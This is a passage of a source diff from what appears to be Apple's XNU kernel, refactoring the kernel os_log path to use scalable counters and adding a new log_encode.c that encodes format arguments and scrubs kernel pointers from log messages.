*fmt, void *dso, void *addr, bool driverKit) { - uintptr_t shift_addr = (uintptr_t)address - (uintptr_t)dso; - kc_format_t kcformat = KCFormatUnknown; - __assert_only bool result = PE_get_primary_kc_format(&kcformat); - assert(result); - if (kcformat == KCFormatStatic || kcformat == KCFormatKCGEN) { - *flags = _firehose_tracepoint_flags_pc_style_shared_cache; - memcpy(buf, (uint32_t[]){ (uint32_t)shift_addr }, sizeof(uint32_t)); - return sizeof(uint32_t); - } else { - kernel_mach_header_t *mh = dso; - - /* - * driverKit will have the dso set as MH_EXECUTE - * (it is logging from a syscall in the kernel) - * but needs logd to parse the address as an - * absolute pc. - */ - if (mh->filetype == MH_EXECUTE && !driverKit) { - *flags = _firehose_tracepoint_flags_pc_style_main_exe; - memcpy(buf, (uint32_t[]){ (uint32_t)shift_addr }, sizeof(uint32_t)); - return sizeof(uint32_t); - } else { - *flags = _firehose_tracepoint_flags_pc_style_absolute; - if (!driverKit) { - shift_addr = VM_KERNEL_UNSLIDE(address); - } else { - shift_addr = (uintptr_t) address; - } - memcpy(buf, (uintptr_t[]){ shift_addr }, sizeof(uintptr_t)); -#if __LP64__ - return 6; // 48 bits are enough -#else - return sizeof(uintptr_t); -#endif - } + if (!PE_get_primary_kc_format(&kcformat)) { + return NULL; } -} - -OS_ALWAYS_INLINE -static inline size_t -_os_log_buffer_pack(uint8_t *buffdata, size_t buffdata_sz, - os_log_buffer_context_t ctx) -{ - os_log_buffer_t buffer = ctx->buffer; - size_t buffer_sz = sizeof(*ctx->buffer) + ctx->content_sz; - size_t total_sz = buffer_sz + ctx->pubdata_sz; - - if (total_sz > buffdata_sz) { - return 0; + switch (kcformat) { + case KCFormatStatic: + case KCFormatKCGEN: + dso = PE_get_kc_baseaddress(KCKindPrimary); + break; + case KCFormatDynamic: + case KCFormatFileset: + if (!dso && (dso = (void *)OSKextKextForAddress(fmt)) == NULL) { + return NULL; + } + if (!_os_trace_addr_in_text_segment(dso, fmt)) { + return NULL; + } + if (!driverKit && (dso != (void 
*)OSKextKextForAddress(addr))) { + return NULL; + } + break; + default: + panic("unknown KC format type"); } - memcpy(buffdata, buffer, buffer_sz); - memcpy(&buffdata[buffer_sz], ctx->pubdata, ctx->pubdata_sz); - return total_sz; + return dso; } static void -_os_log_actual(os_log_t oslog __unused, os_log_type_t type, const char *format, - void *dso, void *addr, os_log_buffer_context_t context, bool driverKit) +_os_log_to_log_internal(os_log_type_t type, const char *fmt, va_list args, void *addr, void *dso, bool driverKit) { - firehose_stream_t stream; - firehose_tracepoint_flags_t flags = 0; - firehose_tracepoint_id_u trace_id; - uint8_t buffdata[OS_LOG_BUFFER_MAX_SIZE]; - size_t addr_len = 0, buffdata_sz; - uint64_t timestamp; - uint64_t thread_id; - - // dso == the start of the binary that was loaded - addr_len = _os_trace_write_location_for_address(buffdata, dso, addr, &flags, driverKit); - buffdata_sz = _os_log_buffer_pack(buffdata + addr_len, - sizeof(buffdata) - addr_len, context); - if (buffdata_sz == 0) { + counter_inc(&oslog_p_total_msgcount); + + if (addr == NULL) { + counter_inc(&oslog_p_unresolved_kc_msgcount); return; } - buffdata_sz += addr_len; - timestamp = firehose_tracepoint_time(firehose_activity_flags_default); - thread_id = thread_tid(current_thread()); - - if (driverKit) { - // set FIREHOSE_TRACEPOINT_PC_DYNAMIC_BIT so logd will not try to find the format string in - // the executable text - trace_id.ftid_value = FIREHOSE_TRACE_ID_MAKE(firehose_tracepoint_namespace_log, - type, flags, (uint32_t)((uintptr_t)addr | FIREHOSE_TRACEPOINT_PC_DYNAMIC_BIT)); - } else { - // create trace_id after we've set additional flags - trace_id.ftid_value = FIREHOSE_TRACE_ID_MAKE(firehose_tracepoint_namespace_log, - type, flags, _os_trace_offset(dso, format, (_firehose_tracepoint_flags_activity_t)flags)); + if ((dso = resolve_dso(fmt, dso, addr, driverKit)) == NULL) { + counter_inc(&oslog_p_unresolved_kc_msgcount); + return; } - if (type == OS_LOG_TYPE_INFO || 
type == OS_LOG_TYPE_DEBUG) { - stream = firehose_stream_memory; + uint8_t buffer[OS_LOG_BUFFER_MAX_SIZE] __attribute__((aligned(8))) = { 0 }; + struct os_log_context_s ctx; + + os_log_context_init(&ctx, &os_log_mem, buffer, sizeof(buffer)); + + if (os_log_context_encode(&ctx, fmt, args, addr, dso, driverKit)) { + _os_log_actual(type, fmt, dso, addr, ctx.ctx_buffer, ctx.ctx_content_sz, + ctx.ctx_ft_flags, driverKit); } else { - stream = firehose_stream_persist; + counter_inc(&oslog_p_error_count); } - _firehose_trace(stream, trace_id, timestamp, buffdata, buffdata_sz, true); + + os_log_context_free(&ctx); } bool @@ -529,14 +450,18 @@ os_log_coprocessor(void *buff, uint64_t buff_len, os_log_type_t type, { firehose_tracepoint_id_u trace_id; firehose_tracepoint_id_t return_id = 0; - firehose_stream_t stream; uint8_t pubdata[OS_LOG_BUFFER_MAX_SIZE]; size_t wr_pos = 0; + if (os_log_turned_off()) { + return false; + } + if (buff_len + 16 + sizeof(uint32_t) > OS_LOG_BUFFER_MAX_SIZE) { return false; } + firehose_stream_t stream = firehose_stream(type); // unlike kext, where pc is used to find uuid, in coprocessor logs the uuid is passed as part of the tracepoint firehose_tracepoint_flags_t flags = _firehose_tracepoint_flags_pc_style_uuid_relative; @@ -551,20 +476,14 @@ os_log_coprocessor(void *buff, uint64_t buff_len, os_log_type_t type, trace_id.ftid_value = FIREHOSE_TRACE_ID_MAKE(firehose_tracepoint_namespace_log, type, flags, offset); - if (type == OS_LOG_TYPE_INFO || type == OS_LOG_TYPE_DEBUG) { - stream = firehose_stream_memory; - } else { - stream = firehose_stream_persist; - } - - os_atomic_inc(&oslog_p_coprocessor_total_msgcount, relaxed); + counter_inc(&oslog_p_coprocessor_total_msgcount); // send firehose tracepoint containing os log to firehose buffer return_id = _firehose_trace(stream, trace_id, timestamp, pubdata, buff_len + wr_pos, stream_log); if (return_id == 0) { - os_atomic_inc(&oslog_p_coprocessor_dropped_msgcount, relaxed); + 
counter_inc(&oslog_p_coprocessor_dropped_msgcount); return false; } return true; @@ -582,7 +501,7 @@ _firehose_trace(firehose_stream_t stream, firehose_tracepoint_id_u ftid, if (slowpath(ft_size + publen > _firehose_chunk_payload_size)) { // We'll need to have some handling here. For now - return 0 - os_atomic_inc(&oslog_p_error_count, relaxed); + counter_inc(&oslog_p_error_count); return 0; } @@ -604,11 +523,11 @@ out: if (!fastpath(ft)) { if (oslog_boot_done) { if (stream == firehose_stream_metadata) { - os_atomic_inc(&oslog_p_metadata_dropped_msgcount, relaxed); + counter_inc(&oslog_p_metadata_dropped_msgcount); } else { // If we run out of space in the persistence buffer we're // dropping the message. - os_atomic_inc(&oslog_p_dropped_msgcount, relaxed); + counter_inc(&oslog_p_dropped_msgcount); } return 0; } @@ -619,7 +538,7 @@ out: offset = firehose_chunk_tracepoint_try_reserve(fbc, stamp, firehose_stream_persist, 0, (uint16_t)publen, 0, NULL); if (offset <= 0) { - os_atomic_inc(&oslog_p_boot_dropped_msgcount, relaxed); + counter_inc(&oslog_p_boot_dropped_msgcount); return 0; } @@ -627,7 +546,7 @@ out: thread_tid(current_thread()), offset); memcpy(ft->ft_data, pubdata, publen); firehose_chunk_tracepoint_end(fbc, ft, ftid); - os_atomic_inc(&oslog_p_saved_msgcount, relaxed); + counter_inc(&oslog_p_saved_msgcount); return ftid.ftid_value; } if (!oslog_boot_done) { @@ -637,9 +556,9 @@ out: __firehose_buffer_tracepoint_flush(ft, ftid); if (stream == firehose_stream_metadata) { - os_atomic_inc(&oslog_p_metadata_saved_msgcount, relaxed); + counter_inc(&oslog_p_metadata_saved_msgcount); } else { - os_atomic_inc(&oslog_p_saved_msgcount, relaxed); + counter_inc(&oslog_p_saved_msgcount); } return ftid.ftid_value; } @@ -686,6 +605,10 @@ os_log_coprocessor_register(const char *uuid, const char *file_path, bool copy) char path[PATH_MAX + sizeof(struct firehose_trace_uuid_info_s)]; } buf; + if (os_log_disabled()) { + return; + } + if (path_size > PATH_MAX) { return; } @@ 
-716,6 +639,10 @@ firehose_trace_metadata(firehose_stream_t stream, firehose_tracepoint_id_u ftid, { oslog_stream_buf_entry_t m_entry = NULL; + if (os_log_disabled()) { + return; + } + // If streaming mode is not on, only log the metadata // in the persistence buffer @@ -730,7 +657,7 @@ firehose_trace_metadata(firehose_stream_t stream, firehose_tracepoint_id_u ftid, m_entry = oslog_stream_create_buf_entry(oslog_stream_link_type_metadata, ftid, stamp, pubdata, publen); if (!m_entry) { - os_atomic_inc(&oslog_s_error_count, relaxed); + counter_inc(&oslog_s_error_count); goto finish; } @@ -855,9 +782,9 @@ test_os_log() T_ASSERT_EQ_INT(TRUE, os_log_debug_enabled(log_handle), "os_log_debug is enabled"); T_ASSERT_EQ_PTR(&_os_log_default, OS_LOG_DEFAULT, "ensure OS_LOG_DEFAULT is _os_log_default"); - total_msg = oslog_p_total_msgcount; - saved_msg = oslog_p_saved_msgcount; - dropped_msg = oslog_p_dropped_msgcount; + total_msg = counter_load(&oslog_p_total_msgcount); + saved_msg = counter_load(&oslog_p_saved_msgcount); + dropped_msg = counter_load(&oslog_p_dropped_msgcount); T_LOG("oslog internal counters total %u , saved %u, dropped %u", total_msg, saved_msg, dropped_msg); T_LOG("Validating with uniqid %u u64 %llu", uniqid, a); @@ -886,45 +813,45 @@ test_os_log() } /* for enabled logging printfs should be saved in oslog as well */ - T_EXPECT_GE_UINT((oslog_p_total_msgcount - total_msg), 2, "atleast 2 msgs should be seen by oslog system"); + T_EXPECT_GE_UINT((counter_load(&oslog_p_total_msgcount) - total_msg), 2, "atleast 2 msgs should be seen by oslog system"); a = mach_absolute_time(); total_seqno = 1; seqno = 1; - total_msg = oslog_p_total_msgcount; - saved_msg = oslog_p_saved_msgcount; - dropped_msg = oslog_p_dropped_msgcount; + total_msg = counter_load(&oslog_p_total_msgcount); + saved_msg = counter_load(&oslog_p_saved_msgcount); + dropped_msg = counter_load(&oslog_p_dropped_msgcount); datalen = scnprintf(databuffer, sizeof(databuffer), TESTOSLOGFMT("oslog_info"), 
uniqid, seqno, total_seqno); checksum = crc32(0, databuffer, datalen); os_log_info(log_handle, TESTOSLOG("oslog_info") "mat%llu", checksum, uniqid, seqno, total_seqno, a); - T_EXPECT_GE_UINT((oslog_p_total_msgcount - total_msg), 1, "total message count in buffer"); + T_EXPECT_GE_UINT((counter_load(&oslog_p_total_msgcount) - total_msg), 1, "total message count in buffer"); datalen = scnprintf(databuffer, sizeof(databuffer), "kernel^0^test^oslog_info#mat%llu", a); match_count = find_pattern_in_buffer(databuffer, datalen, total_seqno); T_EXPECT_EQ_ULONG(match_count, total_seqno, "verify oslog_info does not go to systemlog buffer"); - total_msg = oslog_p_total_msgcount; + total_msg = counter_load(&oslog_p_total_msgcount); test_oslog_info_helper(uniqid, 10); - T_EXPECT_GE_UINT(oslog_p_total_msgcount - total_msg, 10, "test_oslog_info_helper: Should have seen 10 msgs"); + T_EXPECT_GE_UINT(counter_load(&oslog_p_total_msgcount) - total_msg, 10, "test_oslog_info_helper: Should have seen 10 msgs"); - total_msg = oslog_p_total_msgcount; + total_msg = counter_load(&oslog_p_total_msgcount); test_oslog_debug_helper(uniqid, 10); - T_EXPECT_GE_UINT(oslog_p_total_msgcount - total_msg, 10, "test_oslog_debug_helper:Should have seen 10 msgs"); + T_EXPECT_GE_UINT(counter_load(&oslog_p_total_msgcount) - total_msg, 10, "test_oslog_debug_helper:Should have seen 10 msgs"); - total_msg = oslog_p_total_msgcount; + total_msg = counter_load(&oslog_p_total_msgcount); test_oslog_error_helper(uniqid, 10); - T_EXPECT_GE_UINT(oslog_p_total_msgcount - total_msg, 10, "test_oslog_error_helper:Should have seen 10 msgs"); + T_EXPECT_GE_UINT(counter_load(&oslog_p_total_msgcount) - total_msg, 10, "test_oslog_error_helper:Should have seen 10 msgs"); - total_msg = oslog_p_total_msgcount; + total_msg = counter_load(&oslog_p_total_msgcount); test_oslog_default_helper(uniqid, 10); - T_EXPECT_GE_UINT(oslog_p_total_msgcount - total_msg, 10, "test_oslog_default_helper:Should have seen 10 msgs"); + 
T_EXPECT_GE_UINT(counter_load(&oslog_p_total_msgcount) - total_msg, 10, "test_oslog_default_helper:Should have seen 10 msgs"); - total_msg = oslog_p_total_msgcount; + total_msg = counter_load(&oslog_p_total_msgcount); test_oslog_fault_helper(uniqid, 10); - T_EXPECT_GE_UINT(oslog_p_total_msgcount - total_msg, 10, "test_oslog_fault_helper:Should have seen 10 msgs"); + T_EXPECT_GE_UINT(counter_load(&oslog_p_total_msgcount) - total_msg, 10, "test_oslog_fault_helper:Should have seen 10 msgs"); - T_LOG("oslog internal counters total %u , saved %u, dropped %u", oslog_p_total_msgcount, oslog_p_saved_msgcount, - oslog_p_dropped_msgcount); + T_LOG("oslog internal counters total %u , saved %u, dropped %u", counter_load(&oslog_p_total_msgcount), counter_load(&oslog_p_saved_msgcount), + counter_load(&oslog_p_dropped_msgcount)); return KERN_SUCCESS; } @@ -945,8 +872,8 @@ test_os_log_parallel(void) kern_return_t kr; uint32_t uniqid = RandomULong(); - printf("oslog internal counters total %u , saved %u, dropped %u", oslog_p_total_msgcount, oslog_p_saved_msgcount, - oslog_p_dropped_msgcount); + printf("oslog internal counters total %lld , saved %lld, dropped %lld", counter_load(&oslog_p_total_msgcount), counter_load(&oslog_p_saved_msgcount), + counter_load(&oslog_p_dropped_msgcount)); kr = kernel_thread_start(_test_log_loop, NULL, &thread[0]); T_ASSERT_EQ_INT(kr, KERN_SUCCESS, "kernel_thread_start returned successfully"); @@ -964,8 +891,8 @@ test_os_log_parallel(void) thread_deallocate(thread[0]); thread_deallocate(thread[1]); - T_LOG("oslog internal counters total %u , saved %u, dropped %u", oslog_p_total_msgcount, oslog_p_saved_msgcount, - oslog_p_dropped_msgcount); + T_LOG("oslog internal counters total %lld , saved %lld, dropped %lld", counter_load(&oslog_p_total_msgcount), counter_load(&oslog_p_saved_msgcount), + counter_load(&oslog_p_dropped_msgcount)); T_PASS("parallel_logging tests is now complete"); return KERN_SUCCESS; @@ -981,9 +908,9 @@ test_oslog_handleOSLogCtl(int32_t 
* in, int32_t * out, int32_t len) case 1: { /* send out counters */ - out[1] = oslog_p_total_msgcount; - out[2] = oslog_p_saved_msgcount; - out[3] = oslog_p_dropped_msgcount; + out[1] = counter_load(&oslog_p_total_msgcount); + out[2] = counter_load(&oslog_p_saved_msgcount); + out[3] = counter_load(&oslog_p_dropped_msgcount); out[0] = KERN_SUCCESS; break; } @@ -1035,16 +962,16 @@ kern_return_t test_stresslog_dropmsg(uint32_t uniqid) { uint32_t total, saved, dropped; - total = oslog_p_total_msgcount; - saved = oslog_p_saved_msgcount; - dropped = oslog_p_dropped_msgcount; + total = counter_load(&oslog_p_total_msgcount); + saved = counter_load(&oslog_p_saved_msgcount); + dropped = counter_load(&oslog_p_dropped_msgcount); uniqid = RandomULong(); test_oslog_debug_helper(uniqid, 100); - while ((oslog_p_dropped_msgcount - dropped) == 0) { + while ((counter_load(&oslog_p_dropped_msgcount) - dropped) == 0) { test_oslog_debug_helper(uniqid, 100); } - printf("test_stresslog_dropmsg: logged %u msgs, saved %u and caused a drop of %u msgs. \n", oslog_p_total_msgcount - total, - oslog_p_saved_msgcount - saved, oslog_p_dropped_msgcount - dropped); + printf("test_stresslog_dropmsg: logged %lld msgs, saved %lld and caused a drop of %lld msgs. \n", counter_load(&oslog_p_total_msgcount) - total, + counter_load(&oslog_p_saved_msgcount) - saved, counter_load(&oslog_p_dropped_msgcount) - dropped); return KERN_SUCCESS; } diff --git a/libkern/os/log_encode.c b/libkern/os/log_encode.c new file mode 100644 index 000000000..5c2e2e976 --- /dev/null +++ b/libkern/os/log_encode.c @@ -0,0 +1,603 @@ +/* + * Copyright (c) 2015-2020 Apple Inc. All rights reserved. + * + * @APPLE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. 
Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this + * file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_LICENSE_HEADER_END@ + */ + +#include +#include +#include +#include +#include +#include +#include + +#if __has_feature(ptrauth_calls) +#include +#include +#endif /* __has_feature(ptrauth_calls) */ + +#include "log_encode.h" +#include "log_mem.h" + +#define isdigit(ch) (((ch) >= '0') && ((ch) <= '9')) +#define log_context_cursor(ctx) &(ctx)->ctx_hdr->hdr_data[(ctx)->ctx_content_off] + +extern boolean_t doprnt_hide_pointers; + +SCALABLE_COUNTER_DEFINE(oslog_p_fmt_invalid_msgcount); +SCALABLE_COUNTER_DEFINE(oslog_p_fmt_max_args_msgcount); +SCALABLE_COUNTER_DEFINE(oslog_p_truncated_msgcount); + +static bool +is_kernel_pointer(void *arg, size_t arg_len) +{ + if (arg_len < sizeof(void *)) { + return false; + } + + unsigned long long value = 0; + assert(arg_len <= sizeof(value)); + (void) memcpy(&value, arg, arg_len); + +#if __has_feature(ptrauth_calls) + /** + * Strip out the pointer authentication code before + * checking whether the pointer is a kernel address. 
+ */ + value = (unsigned long long)VM_KERNEL_STRIP_PTR(value); +#endif /* __has_feature(ptrauth_calls) */ + + return value >= VM_MIN_KERNEL_AND_KEXT_ADDRESS && value <= VM_MAX_KERNEL_ADDRESS; +} + +static void +log_context_cursor_advance(os_log_context_t ctx, size_t amount) +{ + ctx->ctx_content_off += amount; + assert(log_context_cursor(ctx) <= (ctx->ctx_buffer + ctx->ctx_buffer_sz)); +} + +static bool +log_fits(os_log_context_t ctx, size_t data_size) +{ + return (ctx->ctx_content_off + data_size) <= ctx->ctx_content_sz; +} + +static bool +log_fits_cmd(os_log_context_t ctx, size_t data_size) +{ + return log_fits(ctx, sizeof(*ctx->ctx_hdr) + data_size); +} + +static void +log_range_update(os_log_fmt_range_t range, uint16_t offset, uint16_t length) +{ + range->offset = offset; + /* + * Truncated flag may have already been set earlier, hence do not + * overwrite it blindly. + */ + if (length < range->length) { + range->truncated = true; + } + range->length = length; +} + +/* + * Stores a command in the main section. The value itself is wrapped in + * the os_log_fmt_cmd_t struct. + */ +static void +log_add_cmd(os_log_context_t ctx, os_log_fmt_cmd_type_t type, uint8_t flags, + void *arg, size_t arg_size) +{ + os_log_fmt_cmd_t cmd; + const size_t cmd_sz = sizeof(*cmd) + arg_size; + + assert(log_fits_cmd(ctx, cmd_sz)); + assert(arg_size <= UINT8_MAX); + + cmd = (os_log_fmt_cmd_t)log_context_cursor(ctx); + cmd->cmd_type = type; + cmd->cmd_flags = flags; + cmd->cmd_size = (uint8_t)arg_size; + (void) memcpy(cmd->cmd_data, arg, cmd->cmd_size); + + assert(cmd_sz == sizeof(*cmd) + cmd->cmd_size); + log_context_cursor_advance(ctx, cmd_sz); +} + +/* + * Collect details about argument which needs to be stored in the pubdata + * section. 
+ */ +static void +log_collect_public_range_data(os_log_context_t ctx, os_log_fmt_range_t range, void *arg) +{ + ctx->ctx_pubdata[ctx->ctx_pubdata_cnt++] = (char *)arg; + ctx->ctx_pubdata_sz += range->length; +} + +static void +log_add_range_data(os_log_context_t ctx, os_log_fmt_range_t range, void *arg) +{ + assert(log_fits(ctx, range->length)); + (void) memcpy(log_context_cursor(ctx), arg, range->length); + log_context_cursor_advance(ctx, range->length); +} + +static struct os_log_fmt_range_s +log_create_range(os_log_context_t ctx, size_t arg_len) +{ + const size_t final_arg_len = MIN(arg_len, UINT16_MAX); + + return (struct os_log_fmt_range_s) { + .offset = ctx->ctx_pubdata_sz, + .length = (uint16_t)final_arg_len, + .truncated = (final_arg_len < arg_len) + }; +} + +static int +log_add_range_arg(os_log_context_t ctx, os_log_fmt_cmd_type_t type, os_log_fmt_cmd_flags_t flags, + void *arg, size_t arg_len) +{ + struct os_log_fmt_range_s range; + + if (!log_fits_cmd(ctx, sizeof(range))) { + return ENOMEM; + } + + range = log_create_range(ctx, arg_len); + + if (flags == OSLF_CMD_FLAG_PUBLIC) { + if (ctx->ctx_pubdata_cnt == OS_LOG_MAX_PUB_ARGS) { + return ENOMEM; + } + assert(ctx->ctx_pubdata_cnt < OS_LOG_MAX_PUB_ARGS); + log_collect_public_range_data(ctx, &range, arg); + } + log_add_cmd(ctx, type, flags, &range, sizeof(range)); + ctx->ctx_hdr->hdr_cmd_cnt++; + + return 0; +} + +/* + * Adds a scalar argument value to the main section. 
+ */ +static int +log_add_arg(os_log_context_t ctx, os_log_fmt_cmd_type_t type, void *arg, size_t arg_len) +{ + assert(type == OSLF_CMD_TYPE_COUNT || type == OSLF_CMD_TYPE_SCALAR); + assert(arg_len < UINT16_MAX); + + if (log_fits_cmd(ctx, arg_len)) { + log_add_cmd(ctx, type, OSLF_CMD_FLAG_PUBLIC, arg, arg_len); + ctx->ctx_hdr->hdr_cmd_cnt++; + return 0; + } + + return ENOMEM; +} + +static void +log_encode_public_data(os_log_context_t ctx) +{ + const uint16_t orig_content_off = ctx->ctx_content_off; + os_log_fmt_hdr_t const hdr = ctx->ctx_hdr; + os_log_fmt_cmd_t cmd = (os_log_fmt_cmd_t)hdr->hdr_data; + + assert(ctx->ctx_pubdata_cnt <= hdr->hdr_cmd_cnt); + + for (int i = 0, pub_i = 0; i < hdr->hdr_cmd_cnt; i++, cmd = (os_log_fmt_cmd_t)(cmd->cmd_data + cmd->cmd_size)) { + if (cmd->cmd_type != OSLF_CMD_TYPE_STRING) { + continue; + } + + os_log_fmt_range_t const range __attribute__((aligned(8))) = (os_log_fmt_range_t)&cmd->cmd_data; + + // Fix offset and length of the argument data in the hdr. 
+ log_range_update(range, ctx->ctx_content_off - orig_content_off, + MIN(range->length, ctx->ctx_content_sz - ctx->ctx_content_off)); + + if (range->truncated) { + ctx->ctx_truncated = true; + } + + assert(pub_i < ctx->ctx_pubdata_cnt); + log_add_range_data(ctx, range, ctx->ctx_pubdata[pub_i++]); + } +} + +static bool +log_expand(os_log_context_t ctx, size_t new_size) +{ + assert(new_size > ctx->ctx_buffer_sz); + + if (!oslog_is_safe()) { + return false; + } + + size_t final_size = new_size; + + void *buf = logmem_alloc(ctx->ctx_logmem, &final_size); + if (!buf) { + return false; + } + assert(final_size >= new_size); + + // address length header + already stored data + const size_t hdr_size = (uint8_t *)ctx->ctx_hdr - ctx->ctx_buffer; + const size_t copy_size = hdr_size + sizeof(*ctx->ctx_hdr) + ctx->ctx_content_sz; + assert(copy_size <= new_size); + (void) memcpy(buf, ctx->ctx_buffer, copy_size); + + if (ctx->ctx_allocated) { + logmem_free(ctx->ctx_logmem, ctx->ctx_buffer, ctx->ctx_buffer_sz); + } + + ctx->ctx_buffer = buf; + ctx->ctx_buffer_sz = final_size; + ctx->ctx_content_sz = (uint16_t)(ctx->ctx_buffer_sz - hdr_size - sizeof(*ctx->ctx_hdr)); + ctx->ctx_hdr = (os_log_fmt_hdr_t)&ctx->ctx_buffer[hdr_size]; + ctx->ctx_allocated = true; + + return true; +} + +static int +log_encode_fmt_arg(void *arg, size_t arg_len, os_log_fmt_cmd_type_t type, os_log_context_t ctx) +{ + int rc = 0; + + switch (type) { + case OSLF_CMD_TYPE_COUNT: + case OSLF_CMD_TYPE_SCALAR: + // Scrub kernel pointers. 
+ if (doprnt_hide_pointers && is_kernel_pointer(arg, arg_len)) { + rc = log_add_range_arg(ctx, type, OSLF_CMD_FLAG_PRIVATE, NULL, 0); + ctx->ctx_hdr->hdr_flags |= OSLF_HDR_FLAG_HAS_PRIVATE; + } else { + rc = log_add_arg(ctx, type, arg, arg_len); + } + break; + case OSLF_CMD_TYPE_STRING: + rc = log_add_range_arg(ctx, type, OSLF_CMD_FLAG_PUBLIC, arg, arg_len); + ctx->ctx_hdr->hdr_flags |= OSLF_HDR_FLAG_HAS_NON_SCALAR; + break; + default: + panic("Unsupported log value type"); + } + + return rc; +} + +static int +log_encode_fmt(os_log_context_t ctx, const char *format, va_list args) +{ + const char *percent = strchr(format, '%'); + + while (percent != NULL) { + ++percent; + + if (percent[0] == '%') { + percent = strchr(percent + 1, '%'); // Find next format after %% + continue; + } + + struct os_log_format_value_s value; + int type = OST_INT; + int prec = 0; + char ch; + + for (bool done = false; !done; percent++) { + int err = 0; + + switch (ch = percent[0]) { + /* type of types or other */ + case 'l': // longer + type++; + break; + + case 'h': // shorter + type--; + break; + + case 'z': + type = OST_SIZE; + break; + + case 'j': + type = OST_INTMAX; + break; + + case 't': + type = OST_PTRDIFF; + break; + + case 'q': + type = OST_LONGLONG; + break; + + case '.': // precision + if ((percent[1]) == '*') { + prec = va_arg(args, int); + err = log_encode_fmt_arg(&prec, sizeof(prec), OSLF_CMD_TYPE_COUNT, ctx); + if (slowpath(err)) { + return err; + } + percent++; + continue; + } else { + // we have to read the precision and do the right thing + const char *fmt = percent + 1; + prec = 0; + while (isdigit(ch = *fmt++)) { + prec = 10 * prec + (ch - '0'); + } + + if (prec > 1024) { + prec = 1024; + } + + err = log_encode_fmt_arg(&prec, sizeof(prec), OSLF_CMD_TYPE_COUNT, ctx); + } + break; + + case '-': // left-align + case '+': // force sign + case ' ': // prefix non-negative with space + case '#': // alternate + case '\'': // group by thousands + break; + + /* fixed types */ + 
case 'd': // integer + case 'i': // integer + case 'o': // octal + case 'u': // unsigned + case 'x': // hex + case 'X': // upper-hex + switch (type) { + case OST_CHAR: + value.type.ch = (char) va_arg(args, int); + err = log_encode_fmt_arg(&value.type.ch, sizeof(value.type.ch), OSLF_CMD_TYPE_SCALAR, ctx); + break; + + case OST_SHORT: + value.type.s = (short) va_arg(args, int); + err = log_encode_fmt_arg(&value.type.s, sizeof(value.type.s), OSLF_CMD_TYPE_SCALAR, ctx); + break; + + case OST_INT: + value.type.i = va_arg(args, int); + err = log_encode_fmt_arg(&value.type.i, sizeof(value.type.i), OSLF_CMD_TYPE_SCALAR, ctx); + break; + + case OST_LONG: + value.type.l = va_arg(args, long); + err = log_encode_fmt_arg(&value.type.l, sizeof(value.type.l), OSLF_CMD_TYPE_SCALAR, ctx); + break; + + case OST_LONGLONG: + value.type.ll = va_arg(args, long long); + err = log_encode_fmt_arg(&value.type.ll, sizeof(value.type.ll), OSLF_CMD_TYPE_SCALAR, ctx); + break; + + case OST_SIZE: + value.type.z = va_arg(args, size_t); + err = log_encode_fmt_arg(&value.type.z, sizeof(value.type.z), OSLF_CMD_TYPE_SCALAR, ctx); + break; + + case OST_INTMAX: + value.type.im = va_arg(args, intmax_t); + err = log_encode_fmt_arg(&value.type.im, sizeof(value.type.im), OSLF_CMD_TYPE_SCALAR, ctx); + break; + + case OST_PTRDIFF: + value.type.pd = va_arg(args, ptrdiff_t); + err = log_encode_fmt_arg(&value.type.pd, sizeof(value.type.pd), OSLF_CMD_TYPE_SCALAR, ctx); + break; + + default: + return EINVAL; + } + done = true; + break; + + case 'p': // pointer + value.type.p = va_arg(args, void *); + err = log_encode_fmt_arg(&value.type.p, sizeof(value.type.p), OSLF_CMD_TYPE_SCALAR, ctx); + done = true; + break; + + case 'c': // char + value.type.ch = (char) va_arg(args, int); + err = log_encode_fmt_arg(&value.type.ch, sizeof(value.type.ch), OSLF_CMD_TYPE_SCALAR, ctx); + done = true; + break; + + case 's': // string + value.type.pch = va_arg(args, char *); + if (prec == 0 && value.type.pch) { + prec = (int) 
strlen(value.type.pch) + 1; + } + err = log_encode_fmt_arg(value.type.pch, prec, OSLF_CMD_TYPE_STRING, ctx); + prec = 0; + done = true; + break; + + case 'm': + value.type.i = 0; // Does %m make sense in the kernel? + err = log_encode_fmt_arg(&value.type.i, sizeof(value.type.i), OSLF_CMD_TYPE_SCALAR, ctx); + done = true; + break; + + default: + if (isdigit(ch)) { // [0-9] + continue; + } + return EINVAL; + } + + if (slowpath(err)) { + return err; + } + + if (done) { + percent = strchr(percent, '%'); // Find next format + break; + } + } + } + + return 0; +} + +static inline size_t +write_address_location(uint8_t buf[static sizeof(uint64_t)], + void *dso, const void *address, firehose_tracepoint_flags_t *flags, bool driverKit) +{ + uintptr_t shift_addr = (uintptr_t)address - (uintptr_t)dso; + + kc_format_t kcformat = KCFormatUnknown; + __assert_only bool result = PE_get_primary_kc_format(&kcformat); + assert(result); + + if (kcformat == KCFormatStatic || kcformat == KCFormatKCGEN) { + *flags = _firehose_tracepoint_flags_pc_style_shared_cache; + memcpy(buf, (uint32_t[]){ (uint32_t)shift_addr }, sizeof(uint32_t)); + return sizeof(uint32_t); + } + + /* + * driverKit will have the dso set as MH_EXECUTE (it is logging from a + * syscall in the kernel) but needs logd to parse the address as an + * absolute pc. + */ + kernel_mach_header_t *mh = dso; + if (mh->filetype == MH_EXECUTE && !driverKit) { + *flags = _firehose_tracepoint_flags_pc_style_main_exe; + memcpy(buf, (uint32_t[]){ (uint32_t)shift_addr }, sizeof(uint32_t)); + return sizeof(uint32_t); + } + + *flags = _firehose_tracepoint_flags_pc_style_absolute; + shift_addr = driverKit ? 
